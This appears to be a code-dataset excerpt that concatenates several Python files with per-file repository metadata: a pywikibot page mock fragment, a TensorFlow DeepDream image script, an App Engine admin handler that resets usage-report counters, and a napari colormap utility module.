             apply_cosmetic_changes=None, quiet=False, **kwargs):
        print('Saving page [[%s]] through save' % self.title())
    def _save(self, summary=None, watch=None, minor=True, botflag=None,
              cc=None, quiet=False, **kwargs):
        print('Saving page [[%s]] through _save' % self.title())
@time_this('Page.get() method mock')
def get(self, force=False, get_redirect=False, sysop=False):
for page in self.pages:
xml_title = page.getElementsByTagName(
'title')[0].childNodes[0].nodeValue
if xml_title == self.title():
return page.getElementsByTagName(
'text')[0].childNodes[0].nodeValue
        print('No page %s found in "%s"' % (self.title(), self.filename))
return ''
p = PageMock(SiteMock('en', 'wiktionary'), 'gaon')
e = p.get()
| 36.711111 | 78 | 0.624092 | 1,474 | 0.892252 | 0 | 0 | 478 | 0.289346 | 0 | 0 | 223 | 0.134988 |
c7d6da38ffc0a1fb86619973f197115c4b076c8a | 5,796 | py | Python | dl_tensorflow/deepdream.py | jarvisqi/deep_learning | 988a5b0551ccf2c480a519c66aca149053826d30 | ["MIT"] | 32 | 2017-10-26T13:37:36.000Z | 2021-03-24T09:06:45.000Z | dl_tensorflow/deepdream.py | 2892778775/deep_learning | 988a5b0551ccf2c480a519c66aca149053826d30 | ["MIT"] | 3 | 2018-11-19T05:55:46.000Z | 2019-03-01T05:20:43.000Z | dl_tensorflow/deepdream.py | 2892778775/deep_learning | 988a5b0551ccf2c480a519c66aca149053826d30 | ["MIT"] | 38 | 2017-11-08T15:42:48.000Z | 2021-05-10T00:42:33.000Z |
import os
from functools import partial
from io import BytesIO
import numpy as np
import PIL.Image
import scipy.misc
import tensorflow as tf
graph = tf.Graph()
sess = tf.InteractiveSession(graph=graph)
model_fn = "./models/tensorflow_inception_graph.pb"
with tf.gfile.FastGFile(model_fn, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
t_input = tf.placeholder(tf.float32, name="input")
imagenet_mean = 117.0
t_preprocessed = tf.expand_dims(t_input-imagenet_mean, 0)
tf.import_graph_def(graph_def, {"input": t_preprocessed})
def load_inception():
graph = tf.Graph()
sess = tf.InteractiveSession(graph=graph)
model_fn = "./models/tensorflow_inception_graph.pb"
with tf.gfile.FastGFile(model_fn, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
    # Define t_input as the placeholder for the input image
    t_input = tf.placeholder(np.float32, name='input')
    imagenet_mean = 117.0
    # The input image must be preprocessed before it is fed to the network:
    # expand_dims adds one dimension, turning [height, width, channel]
    # into [1, height, width, channel], and
    # t_input - imagenet_mean subtracts the ImageNet mean value
t_preprocessed = tf.expand_dims(t_input - imagenet_mean, 0)
tf.import_graph_def(graph_def, {'input': t_preprocessed})
    # Find all convolutional layers
    layers = [op.name for op in graph.get_operations() if op.type ==
              "Conv2D" and "import/" in op.name]
    # Print the number of convolutional layers
    print('Number of layers', len(layers))
    # In particular, print the shape of mixed4d_3x3_bottleneck_pre_relu
    name = 'mixed4d_3x3_bottleneck_pre_relu'
    print('shape of %s: %s' % (name, str(graph.get_tensor_by_name('import/' + name + ':0').get_shape())))
def savearray(img_array, img_name):
scipy.misc.toimage(img_array).save(img_name)
print('img saved: %s' % img_name)
def visstd(a, s=0.1):
return (a-a.mean())/max(a.std(), 1e-4)*s+0.5
def resize_ratio(img, ratio):
min = img.min()
max = img.max()
img = (img - min) / (max - min) * 255
img = np.float32(scipy.misc.imresize(img, ratio))
img = img / 255 * (max - min) + min
return img
def resize(img, hw):
min = img.min()
max = img.max()
img = (img - min) / (max - min) * 255
img = np.float32(scipy.misc.imresize(img, hw))
img = img / 255 * (max - min) + min
return img
def calc_grad_tiled(img, t_grad, tile_size=512):
sz = tile_size
h, w = img.shape[:2]
sx, sy = np.random.randint(sz, size=2)
    img_shift = np.roll(np.roll(img, sx, 1), sy, 0)  # shift the whole image along axis 1 (x) first, then along axis 0 (y)
grad = np.zeros_like(img)
for y in range(0, max(h - sz // 2, sz), sz):
for x in range(0, max(w - sz // 2, sz), sz):
sub = img_shift[y:y + sz, x:x + sz]
g = sess.run(t_grad, {t_input: sub})
grad[y:y + sz, x:x + sz] = g
return np.roll(np.roll(grad, -sx, 1), -sy, 0)
k = np.float32([1, 4, 6, 4, 1])
k = np.outer(k, k)
k5x5 = k[:, :, None, None] / k.sum() * np.eye(3, dtype=np.float32)
# Merge a Laplacian pyramid back into a single image
def lap_merge(levels):
img = levels[0]
for hi in levels[1:]:
with tf.name_scope('merge'):
img = tf.nn.conv2d_transpose(img, k5x5 * 4, tf.shape(hi), [1, 2, 2, 1]) + hi
return img
# Normalize img.
def normalize_std(img, eps=1e-10):
with tf.name_scope('normalize'):
std = tf.sqrt(tf.reduce_mean(tf.square(img)))
return img / tf.maximum(std, eps)
# Laplacian pyramid normalization
def lap_normalize(img, scale_n=4):
    img = tf.expand_dims(img, 0)
    tlevels = lap_split_n(img, scale_n)
    # Apply normalize_std to every level
tlevels = list(map(normalize_std, tlevels))
out = lap_merge(tlevels)
return out[0, :, :, :]
# This function splits an image into low- and high-frequency components
def lap_split(img):
    with tf.name_scope('split'):
        # One convolution pass acts as a smoothing, so lo is the low-frequency component
        lo = tf.nn.conv2d(img, k5x5, [1, 2, 2, 1], 'SAME')
        # Upscale the low-frequency part back to the original size (lo2);
        # subtracting lo2 from the original img gives the high-frequency part hi
lo2 = tf.nn.conv2d_transpose(lo, k5x5 * 4, tf.shape(img), [1, 2, 2, 1])
hi = img - lo2
return lo, hi
# This function splits the image img into an n-level Laplacian pyramid
def lap_split_n(img, n):
    levels = []
    for i in range(n):
        # Call lap_split to separate low- and high-frequency parts:
        # the high-frequency part is stored in levels,
        # and the low-frequency part keeps being decomposed
img, hi = lap_split(img)
levels.append(hi)
levels.append(img)
return levels[::-1]
def tffunc(*argtypes):
placeholders = list(map(tf.placeholder, argtypes))
def wrap(f):
out = f(*placeholders)
def wrapper(*args, **kw):
return out.eval(dict(zip(placeholders, args)), session=kw.get('session'))
return wrapper
return wrap
def render_deepdream(img0, iter_n=10, step=1.5, octave_n=4, octave_scale=1.4):
name = 'mixed4d_3x3_bottleneck_pre_relu'
channel = 139
t_obj = graph.get_tensor_by_name("import/%s:0" % name)
t_score = tf.reduce_mean(t_obj)
t_grad = tf.gradients(t_score, t_input)[0]
    lap_n = 4
    # Turn lap_normalize into a regular function
lap_norm_func = tffunc(np.float32)(partial(lap_normalize, scale_n=lap_n))
img = img0
    # Decompose the image into a pyramid here as well;
    # extracting the low and high frequencies this time is simple: plain resizing suffices
octaves = []
for i in range(octave_n-1):
hw = img.shape[:2]
lo = resize(img, np.int32(np.float32(hw) / octave_scale))
hi = img - resize(lo, hw)
img = lo
octaves.append(hi)
    # Generate the low-frequency image first, then progressively upscale it and add the high frequencies back
for octave in range(octave_n):
if octave > 0:
hi = octaves[-octave]
img = resize(img, hi.shape[:2]) + hi
for i in range(iter_n):
g = calc_grad_tiled(img, t_grad)
img += g * (step / (np.abs(g).mean() + 1e-7))
            # The only difference would be using lap_norm_func to normalize g:
            # g = lap_norm_func(g)
            # img += g * step
print('.', end=' ')
img = img.clip(0, 255)
savearray(img, './predict_img/deepdream.jpg')
if __name__ == '__main__':
img0 = PIL.Image.open('./images/test.jpg')
img0 = np.float32(img0)
render_deepdream(img0)
| 30.031088 | 104 | 0.619393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,630 | 0.253106 |
c7d6e3bbbed972de89ca1f857b7b3b2178ada3d2 | 1,829 | py | Python | admin.py | BlueBlock/usage-reporter | e30bbef6d281944d62f716c37aff17861a653967 | ["MIT"] | 4 | 2018-08-30T06:16:35.000Z | 2022-02-18T08:06:21.000Z | admin.py | BlueBlock/usage-reporter | e30bbef6d281944d62f716c37aff17861a653967 | ["MIT"] | 1 | 2018-03-29T17:04:44.000Z | 2018-03-29T17:04:44.000Z | admin.py | BlueBlock/usage-reporter | e30bbef6d281944d62f716c37aff17861a653967 | ["MIT"] | 4 | 2018-01-31T06:55:32.000Z | 2022-01-16T10:39:18.000Z |
import calendar
import datetime
import logging
import os
import webapp2
import dbmodel
TESTING = os.environ.get('SERVER_SOFTWARE', '').startswith('Development')
class ResetHandler(webapp2.RequestHandler):
def get(self):
timestamp = calendar.timegm(datetime.datetime.utcnow().timetuple())
self.response.write('<html><body><form method="POST"><input type="text" value="' + str(
timestamp) + '" name="day"><input type="submit"></form></body></html>')
def post(self):
timestamp = int(self.request.get('day', None))
entry_day = datetime.datetime.utcfromtimestamp(timestamp).date()
logging.info('Processing day %s', entry_day)
starttimestamp = calendar.timegm((entry_day.year, entry_day.month, entry_day.day, 0, 0, 0))
endtimestamp = starttimestamp + 24 * 60 * 60
logging.info('starttimestamp, endtimestamp: (%s, %s)', starttimestamp, endtimestamp)
        count = 0
        # Reset items previously marked as counted (0 or 1) back to the
        # uncounted state (counted=None).
for item in dbmodel.ReportItem.all().filter('counted', 0).filter('eventtype =', 'Information').filter(
'timestamp <', endtimestamp).filter('timestamp >=', starttimestamp).order('timestamp'):
item.counted = None
item.put()
count += 1
for item in dbmodel.ReportItem.all().filter('counted', 1).filter('eventtype =', 'Information').filter(
'timestamp <', endtimestamp).filter('timestamp >=', starttimestamp).order('timestamp'):
item.counted = None
item.put()
count += 1
logging.info('Reset for %s items', count)
        # Delete the day's precomputed aggregates so they can be rebuilt:
        for item in dbmodel.AggregateItem.all().filter('timestamp =', starttimestamp).filter('rangetype =', 'day'):
item.delete()
app = webapp2.WSGIApplication([
('/tasks/admin/reset', ResetHandler)
], debug=TESTING)
| 35.173077 | 115 | 0.632586 | 1,569 | 0.857846 | 0 | 0 | 0 | 0 | 0 | 0 | 430 | 0.235101 |
c7d717769a7df13adf5117eb840b41a6b41f5506 | 2,708 | py | Python | napari/utils/colormaps/categorical_colormap_utils.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | ["BSD-3-Clause"] | 1 | 2021-04-24T10:10:54.000Z | 2021-04-24T10:10:54.000Z | napari/utils/colormaps/categorical_colormap_utils.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | ["BSD-3-Clause"] | 2 | 2021-05-17T02:15:08.000Z | 2022-03-12T21:19:52.000Z | napari/utils/colormaps/categorical_colormap_utils.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | ["BSD-3-Clause"] | null | null | null |
from dataclasses import dataclass
from itertools import cycle
from typing import Dict, Union
import numpy as np
from ...layers.utils.color_transformations import (
transform_color,
transform_color_cycle,
)
@dataclass(eq=False)
class ColorCycle:
"""A dataclass to hold a color cycle for the fallback_colors
in the CategoricalColormap
Attributes
----------
values : np.ndarray
The (Nx4) color array of all colors contained in the color cycle.
cycle : cycle
The cycle object that gives fallback colors.
"""
values: np.ndarray
cycle: cycle
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
# turn a generic dict into object
if isinstance(val, dict):
return _coerce_colorcycle_from_dict(val)
elif isinstance(val, ColorCycle):
return val
else:
return _coerce_colorcycle_from_colors(val)
def _json_encode(self):
return {'values': self.values.tolist()}
def __eq__(self, other):
if isinstance(other, ColorCycle):
eq = np.array_equal(self.values, other.values)
else:
eq = False
return eq
def _coerce_colorcycle_from_dict(
val: Dict[str, Union[str, list, np.ndarray, cycle]]
) -> ColorCycle:
# validate values
color_values = val.get('values')
if color_values is None:
raise ValueError('ColorCycle requires a values argument')
transformed_color_values = transform_color(color_values)
# validate cycle
color_cycle = val.get('cycle')
if color_cycle is None:
transformed_color_cycle = transform_color_cycle(
color_cycle=color_values,
elem_name='color_cycle',
default="white",
)[0]
else:
transformed_color_cycle = color_cycle
return ColorCycle(
values=transformed_color_values, cycle=transformed_color_cycle
)
def _coerce_colorcycle_from_colors(
val: Union[str, list, np.ndarray]
) -> ColorCycle:
if isinstance(val, str):
val = [val]
(
transformed_color_cycle,
transformed_color_values,
) = transform_color_cycle(
color_cycle=val,
elem_name='color_cycle',
default="white",
)
return ColorCycle(
values=transformed_color_values, cycle=transformed_color_cycle
)
def compare_colormap_dicts(cmap_1, cmap_2):
if len(cmap_1) != len(cmap_2):
return False
for k, v in cmap_1.items():
if k not in cmap_2:
return False
if not np.allclose(v, cmap_2[k]):
return False
return True
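# Illustrative usage sketch (an addition, not part of the original module).
# The relative imports above mean this file only runs inside the napari
# package, so the example is left as comments:
#
#     cc = ColorCycle.validate_type(['red', 'green', 'blue'])
#     cc.values         # a (3, 4) float array of RGBA colors
#     next(cc.cycle)    # the next fallback color from the cycle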
| 25.308411 | 73 | 0.64771 | 1,022 | 0.3774 | 60 | 0.022157 | 1,043 | 0.385155 | 0 | 0 | 467 | 0.172452 |